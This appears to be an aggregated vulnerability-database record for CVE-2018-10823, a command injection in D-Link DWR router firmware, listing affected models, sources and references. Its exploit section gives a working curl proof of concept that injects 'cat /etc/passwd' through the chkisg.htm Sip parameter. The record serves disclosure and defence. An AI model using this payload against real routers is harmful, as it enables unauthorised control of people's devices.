ID

VAR-E-201704-0088


CVE

cve_id:CVE-2018-10823

Trust: 2.1

cve_id:CVE-2017-6190

Trust: 1.3

cve_id:CVE-2018-10822

Trust: 0.5

cve_id:CVE-2018-10824

Trust: 0.5

sources: BID: 97620 // PACKETSTORM: 142052 // PACKETSTORM: 149844 // EXPLOIT-DB: 45676 // EDBNET: 99965

EDB ID

45676


TITLE

D-Link Routers - Command Injection - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 45676

DESCRIPTION

D-Link Routers - Command Injection. CVE-2018-10823 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 45676

AFFECTED PRODUCTS

vendor:d linkmodel:routersscope: - version: -

Trust: 1.6

vendor:d linkmodel:dwr-116scope: - version: -

Trust: 0.5

vendor:d linkmodel:plain-text password storagescope: - version: -

Trust: 0.5

vendor:d linkmodel:dwr-116 1.05scope: - version: -

Trust: 0.3

vendor:d linkmodel:dwr-116 1.01scope: - version: -

Trust: 0.3

vendor:d linkmodel:dwr-116 1.00 b10scope: - version: -

Trust: 0.3

vendor:d linkmodel:dwr-116 1.05b09scope:neversion: -

Trust: 0.3

sources: BID: 97620 // PACKETSTORM: 142052 // PACKETSTORM: 149844 // EXPLOIT-DB: 45676 // EDBNET: 99965

EXPLOIT

## Shell command injection
CVE: CVE-2018-10823

CVSS v3: 9.1
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Description: An issue was discovered on D-Link routers:

DWR-116 through 1.06,
DWR-512 through 2.02,
DWR-712 through 2.02,
DWR-912 through 2.02,
DWR-921 through 2.02,
DWR-111 through 1.01,
and probably others with the same type of firmware.
An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.

PoC:

Login to the router.
Request the following URL after login:
`$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd`
See the passwd file contents in the response.

Trust: 1.0

sources: EXPLOIT-DB: 45676

EXPLOIT LANGUAGE

md

Trust: 0.6

sources: EXPLOIT-DB: 45676

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 45676

TYPE

Command Injection

Trust: 1.6

sources: EXPLOIT-DB: 45676 // EDBNET: 99965

TAGS

tag:exploit

Trust: 1.0

tag:file inclusion

Trust: 1.0

tag:arbitrary

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:code execution

Trust: 0.5

sources: PACKETSTORM: 142052 // PACKETSTORM: 149844

CREDITS

Blazej Adamczyk

Trust: 0.6

sources: EXPLOIT-DB: 45676

EXTERNAL IDS

db:NVDid:CVE-2018-10823

Trust: 2.1

db:EXPLOIT-DBid:45676

Trust: 1.6

db:NVDid:CVE-2017-6190

Trust: 1.3

db:EDBNETid:99965

Trust: 0.6

db:PACKETSTORMid:142052

Trust: 0.5

db:NVDid:CVE-2018-10824

Trust: 0.5

db:NVDid:CVE-2018-10822

Trust: 0.5

db:PACKETSTORMid:149844

Trust: 0.5

db:BIDid:97620

Trust: 0.3

sources: BID: 97620 // PACKETSTORM: 142052 // PACKETSTORM: 149844 // EXPLOIT-DB: 45676 // EDBNET: 99965

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2018-10823

Trust: 2.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-6190

Trust: 1.0

url:http://sploit.tech/2018/10/12/d-link.html

Trust: 1.0

url:https://www.exploit-db.com/exploits/45676/

Trust: 0.6

url:https://nvd.nist.gov/vuln/detail/cve-2018-10822

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2018-10824

Trust: 0.5

url:http://seclists.org/bugtraq/2017/apr/28

Trust: 0.3

url:http://www.d-link.com

Trust: 0.3

sources: BID: 97620 // PACKETSTORM: 142052 // PACKETSTORM: 149844 // EXPLOIT-DB: 45676 // EDBNET: 99965

SOURCES

db:BIDid:97620
db:PACKETSTORMid:142052
db:PACKETSTORMid:149844
db:EXPLOIT-DBid:45676
db:EDBNETid:99965

LAST UPDATE DATE

2022-07-27T09:11:31.161000+00:00


SOURCES UPDATE DATE

db:BIDid:97620date:2017-04-18T00:06:00

SOURCES RELEASE DATE

db:BIDid:97620date:2017-04-07T00:00:00
db:PACKETSTORMid:142052date:2017-04-07T19:22:22
db:PACKETSTORMid:149844date:2018-10-18T03:47:09
db:EXPLOIT-DBid:45676date:2018-10-12T00:00:00
db:EDBNETid:99965date:2018-11-04T00:00:00